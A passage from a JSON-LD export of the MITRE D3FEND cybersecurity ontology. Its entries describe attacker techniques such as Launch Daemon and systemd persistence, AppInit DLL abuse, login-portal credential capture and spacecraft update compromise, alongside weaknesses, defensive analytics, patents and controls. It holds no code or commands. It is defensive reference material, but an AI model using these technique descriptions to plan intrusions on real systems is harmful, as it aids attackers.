        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBC",
      "d3f:definition": "Projection Based Clustering is a clustering framework based on a chosen projection method and projection method a parameter-free high-dimensional data visualization technique.",
      "d3f:kb-article": "## References\nR Core Team. (2021). ProjectionBasedClustering: Projection Based Clustering. [Link](https://cran.r-project.org/web/packages/ProjectionBasedClustering/ProjectionBasedClustering.pdf)\n\nLai, J. H., Liu, Y., & Wu, W. (2017). Projection Based Clustering. [Link](https://www.researchgate.net/publication/319006501_Projection_Based_Clustering)",
      "rdfs:label": "Projection-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:archived-at",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "archived-at"
      },
      "rdfs:range": {
        "@id": "xsd:anyURI"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:T1543.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.004",
      "d3f:definition": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)",
      "d3f:modifies": {
        "@id": "d3f:PropertyListFile"
      },
      "rdfs:label": "Launch Daemon",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N3db209bbeb23424e9647d2aa5cb318b9"
        }
      ]
    },
    {
      "@id": "_:N3db209bbeb23424e9647d2aa5cb318b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:T1597.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597.002",
      "d3f:definition": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.",
      "rdfs:label": "Purchase Technical Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1597"
      }
    },
    {
      "@id": "d3f:BusNetworkNode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:connected-to": {
        "@id": "d3f:BusNetwork"
      },
      "d3f:definition": "A device or logical endpoint whose interface is directly connected to a bus and exchanges data over the shared medium using the protocol implemented on that interface.",
      "d3f:transmits": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "rdfs:label": "Bus Network Node",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Host"
        },
        {
          "@id": "_:N1e3d12c08a1749e584d2a0312b9bc27b"
        },
        {
          "@id": "_:N61ade077415d4cea89c9a7e9d589de9f"
        }
      ]
    },
    {
      "@id": "_:N1e3d12c08a1749e584d2a0312b9bc27b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connected-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetwork"
      }
    },
    {
      "@id": "_:N61ade077415d4cea89c9a7e9d589de9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:transmits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1543.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.002",
      "d3f:definition": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.",
      "d3f:may-create": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Systemd Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N44826519c01d45d9a931829b374879a7"
        },
        {
          "@id": "_:N7f673bf761d64401afb6ad97e2e64481"
        }
      ]
    },
    {
      "@id": "_:N44826519c01d45d9a931829b374879a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:N7f673bf761d64401afb6ad97e2e64481",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:Reference-ServiceOutlierExecutables_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-09-005/"
      },
      "d3f:kb-abstract": "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-09-005: Service Outlier Executables",
      "rdfs:label": "Reference - CAR-2013-09-005: Service Outlier Executables - MITRE"
    },
    {
      "@id": "d3f:CCI-000374_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to respond to unauthorized changes to organization-defined configuration settings.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000374"
    },
    {
      "@id": "d3f:T1568.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.003",
      "d3f:definition": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)",
      "rdfs:label": "DNS Calculation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:CWE-710",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-710",
      "d3f:definition": "The product does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.",
      "rdfs:label": "Improper Adherence to Coding Standards",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-005%3AAppInitDLLs_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-005/"
      },
      "d3f:kb-abstract": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-005: AppInit DLLs",
      "rdfs:label": "Reference - CAR-2020-09-005: AppInit DLLs - MITRE"
    },
    {
      "@id": "d3f:CWE-506",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-506",
      "d3f:definition": "The product contains code that appears to be malicious in nature.",
      "rdfs:label": "Embedded Malicious Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-912"
      }
    },
    {
      "@id": "d3f:T1216",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216",
      "d3f:definition": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
      "rdfs:label": "System Script Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:SubspaceClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SC",
      "d3f:definition": "Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces within a dataset.",
      "d3f:kb-article": "## References\nParsons, L., Haque, E., & Liu, H. (2004). Subspace Clustering for High Dimensional Data: A Review. [Link](https://www.kdd.org/exploration_files/parsons.pdf)",
      "rdfs:label": "Subspace Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:CorrelationClustering"
      }
    },
    {
      "@id": "d3f:RD-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003.01",
      "d3f:definition": "Threat actors obtain or adapt exploits (the trigger) and payloads (the action after exploitation) for space, ground, and cloud components. Targets include flight software parsers and table loaders, bootloaders and patch/update handlers, bus gateways, payload controllers, and ground services. Payloads may be binaries, scripts, or command/procedure sequences that alter modes, bypass FDIR, or stage follow-on access; they can also be “data payloads” that exploit weak validation (malformed tables, ephemeris, or calibration products). Acquisition paths mirror the broader market, brokered N-day/0-day packages, open-source exploits re-tooled for mission stacks, and theft from vendors or researchers. Actors tune timing, size/rate limits, and anti-replay nuances so delivery fits pass windows and link budgets, and they rehearse on flatsats to achieve deterministic outcomes.",
      "rdfs:label": "Exploit/Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0003"
      },
      "skos:prefLabel": "Exploit/Payload"
    },
    {
      "@id": "d3f:T1546.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.010",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> or <code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "AppInit DLLs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N56dd777d13ad4e31b7385f96e3a1aa4e"
        },
        {
          "@id": "_:N3eba7b9345864dda9aadc873f9b6da23"
        },
        {
          "@id": "_:N7c79a89c701f46ca9f35f53f28e60ff4"
        }
      ]
    },
    {
      "@id": "_:N56dd777d13ad4e31b7385f96e3a1aa4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N3eba7b9345864dda9aadc873f9b6da23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N7c79a89c701f46ca9f35f53f28e60ff4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:ATLASThing",
      "@type": "owl:Class",
      "rdfs:label": "ATLAS Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:T1056.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1056.003",
      "d3f:definition": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.",
      "d3f:modifies": {
        "@id": "d3f:WebApplication"
      },
      "rdfs:label": "Web Portal Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N5aba0c47088747acb0ae228ff4bc36b7"
        }
      ]
    },
    {
      "@id": "_:N5aba0c47088747acb0ae228ff4bc36b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebApplication"
      }
    },
    {
      "@id": "d3f:IA-0007.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007.01",
      "d3f:definition": "Adversaries may target the pipeline that produces and transmits updates to an on-orbit vehicle. Manipulation points include source repositories and configuration tables, build and packaging steps that generate images or differential patches, staging areas on ground servers, update metadata (versions, counters, manifests), and the transmission process itself. Spacecraft updates span flight software patches, FPGA bitstreams, bootloader or device firmware loads, and operational data products such as command tables, ephemerides, and calibration files, each with distinct formats, framing, and acceptance rules. An attacker positioned in the ground system can substitute or modify an artifact, alter its timing and timetags to match pass windows, and queue it through the same procedures operators use for nominal maintenance. Activation can be immediate or deferred: implants may lie dormant until a specific mode, safing entry, or table index is referenced.",
      "rdfs:label": "Compromise On-Orbit Update - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0007"
      },
      "skos:prefLabel": "Compromise On-Orbit Update"
    },
    {
      "@id": "d3f:T1095",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1095",
      "d3f:definition": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Non-Application Layer Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N0afa7ad0a40341288a6edd31dd32ca28"
        }
      ]
    },
    {
      "@id": "_:N0afa7ad0a40341288a6edd31dd32ca28",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-DetectingNetworkReconnaissanceByTrackingIntranetDark-netCommunications_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150264078A1"
      },
      "d3f:kb-abstract": "A method and system for detecting network reconnaissance is disclosed wherein network traffic can be parsed into unidirectional flows that correspond to sessions. A learning module may categorize computing entities inside the network into assets and generate asset data to monitor the computing entities. If one or more computing entities address a flow to an address of a host that no longer exists, ghost asset data may be recorded and updated in the asset data. When a computing entity inside the network contacts an object in the dark-net, the computing entity may be recorded a potential mapper. When the computing entity tries to contact a number of objects in the dark-net, such that a computed threshold is exceeded, the computing entity is identified a malicious entity performing network reconnaissance.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; Sungwook Yoon",
      "d3f:kb-mitre-analysis": "This patent describes detecting an attacker performing internal reconnaissance within an organization's network to gather intelligence about the configuration of the network or identify the next target.  Network packets are collected (ex. tapped from a network switch) and processed to create flows that are used to map out the network to identify network assets as well as ghost assets (addresses not assigned to a device or an existing device that is temporarily disabled). Once this mapping is complete it is used to monitor the network to determine if an attacker is attempting to connect to a ghost asset. If an attacker attempts to connect to a ghost asset over a threshold (ex. contacting four ghost assets in less than seven minutes), an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ConnectionAttemptAnalysis"
      },
      "d3f:kb-reference-title": "Detecting network reconnaissance by tracking intranet dark-net communications",
      "rdfs:label": "Reference - Detecting network reconnaissance by tracking intranet dark-net communications - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-1108",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1108",
      "d3f:definition": "The code is structured in a way that relies too much on using or setting global variables throughout various points in the code, instead of preserving the associated information in a narrower, more local context.",
      "rdfs:label": "Excessive Reliance on Global Variables",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1591.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.002",
      "d3f:definition": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.",
      "rdfs:label": "Business Relationships",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:MoveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call to rename or move a file.  Linux's rename() is an example of this kind of system call. Another way of handling it is to call a copy file system call followed by a delete file system call.",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Move File",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/rename.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nbf8bcb59b51a4eccb585039c800994f4"
        }
      ],
      "skos:altLabel": "Rename File"
    },
    {
      "@id": "_:Nbf8bcb59b51a4eccb585039c800994f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:T1602",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602",
      "d3f:definition": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.",
      "rdfs:label": "Data from Configuration Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:CollectionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-237",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-237",
      "d3f:definition": "The product does not handle or incorrectly handles inputs that are related to complex structures.",
      "rdfs:label": "Improper Handling of Structural Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:AML.T0085.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085.000",
      "d3f:definition": "Adversaries may prompt the AI service to retrieve data from a RAG database. This can include the majority of an organization's internal documents.",
      "rdfs:label": "RAG Databases - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0085"
      },
      "skos:prefLabel": "RAG Databases"
    },
    {
      "@id": "d3f:CWE-173",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-173",
      "d3f:definition": "The product does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent.",
      "rdfs:label": "Improper Handling of Alternate Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:Reference-Web-BasedEnterpriseManagement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dmtf.org/standards/wbem"
      },
      "d3f:kb-organization": "Distributed Management Task Force (DMTF)",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Web-Based Enterprise Management",
      "rdfs:label": "Reference - Web-Based Enterprise Management"
    },
    {
      "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190205511A1"
      },
      "d3f:kb-abstract": "Systems, methods, and related technologies for account access monitoring are described. In certain aspects, a login request associated with a device can be analyzed and a score determined. The score and a threshold can be used to determine whether to initiate an action.",
      "d3f:kb-author": "Chunhui Zhan, Siying Yang",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Forescout Technologies",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:kb-reference-title": "Account monitoring",
      "rdfs:label": "Reference - Account monitoring - Forescout Technologies"
    },
    {
      "@id": "d3f:CWE-576",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-576",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using the java.io package.",
      "rdfs:label": "EJB Bad Practices: Use of Java I/O",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:LinuxRead",
      "@type": "owl:Class",
      "d3f:definition": "Read from a file descriptor.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/read.2.html"
      },
      "rdfs:label": "Linux Read",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Multi-factor Authentication to Non-privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(2)"
    },
    {
      "@id": "d3f:DescriptiveStatistics",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DS",
      "d3f:definition": "Descriptive statistics provide simple summaries about the sample and about the observations that have been made.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Descriptive statistics. [Link](https://en.wikipedia.org/wiki/Descriptive_statistics)",
      "rdfs:label": "Descriptive Statistics",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:T0810",
      "@type": "owl:Class",
      "d3f:attack-id": "T0810",
      "d3f:definition": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Data Historian Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Data Historian Compromise"
    },
    {
      "@id": "d3f:CloudServiceSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Senses data from cloud service platforms. Including data from cloud service  authentications, authorizations, and other activities.",
      "d3f:monitors": [
        {
          "@id": "d3f:CloudServiceAuthentication"
        },
        {
          "@id": "d3f:CloudServiceAuthorization"
        }
      ],
      "rdfs:label": "Cloud Service Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberSensor"
        },
        {
          "@id": "_:Nbb4a68a7b5b946eaa58a2d495a7a7c43"
        },
        {
          "@id": "_:Nc5c36fea6ca144fd8a8d1c054e8ad24a"
        }
      ]
    },
    {
      "@id": "_:Nbb4a68a7b5b946eaa58a2d495a7a7c43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceAuthentication"
      }
    },
    {
      "@id": "_:Nc5c36fea6ca144fd8a8d1c054e8ad24a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceAuthorization"
      }
    },
    {
      "@id": "d3f:T1027.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.008",
      "d3f:definition": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)",
      "rdfs:label": "Stripped Payloads",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:BootloaderAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BootloaderAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:BootLoader"
      },
      "d3f:d3fend-id": "D3-BA",
      "d3f:definition": "Cryptographically authenticating the bootloader software before system boot.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UEFIPlatformInitialization-Specification"
      },
      "d3f:synonym": "Secure Boot",
      "rdfs:label": "Bootloader Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nf18b231fad4f4a2aa21e056fe55b27f8"
        }
      ]
    },
    {
      "@id": "_:Nf18b231fad4f4a2aa21e056fe55b27f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:Reference-CertificateTransparency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.certificate-transparency.org/"
      },
      "d3f:kb-abstract": "Google's Certificate Transparency project fixes several structural flaws in the SSL certificate system, which is the main cryptographic system that underlies all HTTPS connections.\n\nThese flaws weaken the reliability and effectiveness of encrypted Internet connections and can compromise critical TLS/SSL mechanisms, including domain validation, end-to-end encryption, and the chains of trust set up by certificate authorities.",
      "d3f:kb-author": "Google",
      "d3f:kb-organization": "Google",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Certificate Transparency",
      "rdfs:label": "Reference - Certificate Transparency"
    },
    {
      "@id": "d3f:T1059.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.005",
      "d3f:definition": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)",
      "rdfs:label": "Visual Basic",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:OSAPIConnectSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that establishes a connection between a socket and a endpooint.",
      "d3f:invokes": {
        "@id": "d3f:ConnectSocket"
      },
      "rdfs:label": "OS API Connect Socket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N0d04ea58db394423964558dbb203363a"
        }
      ]
    },
    {
      "@id": "_:N0d04ea58db394423964558dbb203363a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConnectSocket"
      }
    },
    {
      "@id": "d3f:T0878",
      "@type": "owl:Class",
      "d3f:attack-id": "T0878",
